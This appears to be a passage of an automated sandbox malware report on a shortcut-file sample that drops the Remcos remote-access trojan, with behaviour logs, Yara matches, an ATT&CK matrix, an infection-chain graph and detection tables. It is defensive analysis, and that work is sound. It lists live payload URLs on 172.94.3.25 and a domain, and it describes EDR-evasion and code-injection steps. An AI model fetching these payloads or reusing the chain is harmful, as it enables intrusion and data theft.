                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,16_2_00401626
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA5D72B __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,17_2_6FA5D72B
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,16_2_00404FAA
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED

                      Remote Access Functionality

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information112
                      Scripting                      		Valid Accounts2
                      Native API                      		112
                      Scripting                      		1
                      Abuse Elevation Control Mechanism                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		2
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		11
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Exploitation for Client Execution                      		11
                      DLL Side-Loading                      		11
                      DLL Side-Loading                      		1
                      Abuse Elevation Control Mechanism                      		LSASS Memory3
                      File and Directory Discovery                      		Remote Desktop Protocol1
                      Input Capture                      		1
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      Scheduled Task/Job                      		1
                      Scheduled Task/Job                      		311
                      Process Injection                      		2
                      Obfuscated Files or Information                      		Security Account Manager145
                      System Information Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts2
                      PowerShell                      		2
                      Registry Run Keys / Startup Folder                      		1
                      Scheduled Task/Job                      		11
                      DLL Side-Loading                      		NTDS221
                      Security Software Discovery                      		Distributed Component Object ModelInput Capture121
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script2
                      Registry Run Keys / Startup Folder                      		131
                      Masquerading                      		LSA Secrets11
                      Process Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
                      Virtualization/Sandbox Evasion                      		Cached Domain Credentials31
                      Virtualization/Sandbox Evasion                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
                      Process Injection                      		DCSync11
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1518489 Sample: Dlr7HYI6VL.lnk Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 104 Found malware configuration 2->104 106 Malicious sample detected (through community Yara rule) 2->106 108 Antivirus detection for dropped file 2->108 110 13 other signatures 2->110 13 cmd.exe 1 2->13         started        16 DZIPR.exe 1 2->16         started        18 DZIPR.exe 2->18         started        20 svchost.exe 1 1 2->20         started        process3 dnsIp4 152 Windows shortcut file (LNK) starts blacklisted processes 13->152 154 Wscript starts Powershell (via cmd or directly) 13->154 23 cmd.exe 3 2 13->23         started        25 powershell.exe 14 16 13->25         started        30 powershell.exe 16 13->30         started        36 2 other processes 13->36 156 Maps a DLL or memory area into another process 16->156 158 Found direct / indirect Syscall (likely to bypass EDR) 16->158 32 cmd.exe 2 16->32         started        34 cmd.exe 18->34         started        100 127.0.0.1 unknown unknown 20->100 signatures5 process6 dnsIp7 38 wscript.exe 1 23->38         started        41 conhost.exe 23->41         started        102 172.94.3.25, 49712, 49713, 49714 VOXILITYGB United States 25->102 86 C:\Users\user\AppData\Roaming\hello.bat, DOS 25->86 dropped 144 Powershell drops PE file 25->144 88 C:\Users\user\AppData\Roaming\hi.vbs, ASCII 30->88 dropped 90 C:\Users\user\AppData\Local\Temp\qapuwvr, PE32 32->90 dropped 146 Injects code into the Windows Explorer (explorer.exe) 32->146 148 Writes to foreign memory regions 32->148 150 Maps a DLL or memory area into another process 32->150 43 conhost.exe 32->43         started        45 explorer.exe 32->45         started        92 C:\Users\user\AppData\Local\Temp\gps, PE32 34->92 dropped 47 conhost.exe 34->47         started        49 explorer.exe 34->49         started        94 C:\Users\user\AppData\Roaming\ffo.bat, DOS 36->94 dropped file8 signatures9 process10 signatures11 124 Windows shortcut file (LNK) starts blacklisted processes 38->124 126 Wscript starts Powershell (via cmd or directly) 38->126 128 Windows Scripting host queries suspicious COM object (likely to drop second stage) 38->128 130 Suspicious execution chain found 38->130 51 cmd.exe 1 38->51         started        process12 signatures13 120 Windows shortcut file (LNK) starts blacklisted processes 51->120 122 Wscript starts Powershell (via cmd or directly) 51->122 54 AUGUST.exe 6 51->54         started        58 powershell.exe 16 51->58         started        60 conhost.exe 51->60         started        process14 file15 80 C:\Users\user\DZIPR.exe, PE32 54->80 dropped 82 C:\Users\user\DZIPR.dll, PE32 54->82 dropped 140 Drops PE files to the user root directory 54->140 62 DZIPR.exe 5 54->62         started        84 C:\Users\user\AppData\Roaming\AUGUST.exe, PE32 58->84 dropped signatures16 process17 file18 96 C:\Users\user\AppData\Roaming\...\DZIPR.exe, PE32 62->96 dropped 98 C:\Users\user\AppData\Roaming\...\DZIPR.dll, PE32 62->98 dropped 160 Switches to a custom stack to bypass stack traces 62->160 162 Found direct / indirect Syscall (likely to bypass EDR) 62->162 66 DZIPR.exe 1 62->66         started        signatures19 process20 signatures21 112 Windows shortcut file (LNK) starts blacklisted processes 66->112 114 Maps a DLL or memory area into another process 66->114 116 Switches to a custom stack to bypass stack traces 66->116 118 Found direct / indirect Syscall (likely to bypass EDR) 66->118 69 cmd.exe 5 66->69         started        process22 file23 78 C:\Users\user\AppData\Local\Temp\demhwk, PE32 69->78 dropped 132 Injects code into the Windows Explorer (explorer.exe) 69->132 134 Writes to foreign memory regions 69->134 136 Found hidden mapped module (file has been removed from disk) 69->136 138 2 other signatures 69->138 73 explorer.exe 69->73         started        76 conhost.exe 69->76         started        signatures24 process25 signatures26 142 Switches to a custom stack to bypass stack traces 73->142

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Dlr7HYI6VL.lnk16%ReversingLabsScript-BAT.Trojan.Heuristic
                      Dlr7HYI6VL.lnk100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\gps100%AviraBDS/Backdoor.Gen
                      C:\Users\user\AppData\Local\Temp\demhwk100%AviraBDS/Backdoor.Gen
                      C:\Users\user\AppData\Local\Temp\qapuwvr100%AviraBDS/Backdoor.Gen
                      C:\Users\user\AppData\Local\Temp\gps100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\demhwk100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\qapuwvr100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\demhwk87%ReversingLabsWin32.Backdoor.Remcos
                      C:\Users\user\AppData\Local\Temp\gps87%ReversingLabsWin32.Backdoor.Remcos
                      C:\Users\user\AppData\Local\Temp\qapuwvr87%ReversingLabsWin32.Backdoor.Remcos
                      C:\Users\user\AppData\Roaming\AUGUST.exe3%ReversingLabs
                      C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll0%ReversingLabs
                      C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe0%ReversingLabs
                      C:\Users\user\DZIPR.dll0%ReversingLabs
                      C:\Users\user\DZIPR.exe0%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.symauth.com/cps0(0%URL Reputationsafe
                      https://www.datanumen.com/zip-repair/0%Avira URL Cloudsafe
                      http://www.vmware.com/00%Avira URL Cloudsafe
                      https://www.digicert.c0%Avira URL Cloudsafe
                      fullimmersion777.com0%Avira URL Cloudsafe
                      http://172.94.3.25/ffo.bat0%Avira URL Cloudsafe
                      https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm0%Avira URL Cloudsafe
                      http://172.94.3.25/AUGUST.exe0%Avira URL Cloudsafe
                      https://g.live.com/odclientsettings/Prod1C:0%Avira URL Cloudsafe
                      http://172.94.3.25/hi.vbs0%Avira URL Cloudsafe
                      http://www.symauth.com/rpa000%Avira URL Cloudsafe
                      http://www.info-zip.org/0%Avira URL Cloudsafe
                      http://www.vmware.com/0/0%Avira URL Cloudsafe
                      http://c0rl.m%L0%Avira URL Cloudsafe
                      http://172.94.3.25/hello.bat0%Avira URL Cloudsafe
                      http://www.repairfile.com0%Avira URL Cloudsafe
                      https://g.live.com/odclientsettings/ProdV21C:0%Avira URL Cloudsafe
                      https://www.datanumen.com/%https://www.datanumen.com/zip-repair/0%Avira URL Cloudsafe
                      http://support.datanumen.com0%Avira URL Cloudsafe
                      https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf0%Avira URL Cloudsafe
                      https://www.datanumen.com/support/0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://172.94.3.25/hi.vbstrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://172.94.3.25/AUGUST.exetrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://172.94.3.25/ffo.battrue
                      • Avira URL Cloud: safe
                      		unknown
                      fullimmersion777.comtrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://172.94.3.25/hello.battrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://g.live.com/odclientsettings/Prod1C:svchost.exe, 00000015.00000003.2438441779.000002061F05E000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://www.digicert.cDZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.vmware.com/0DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
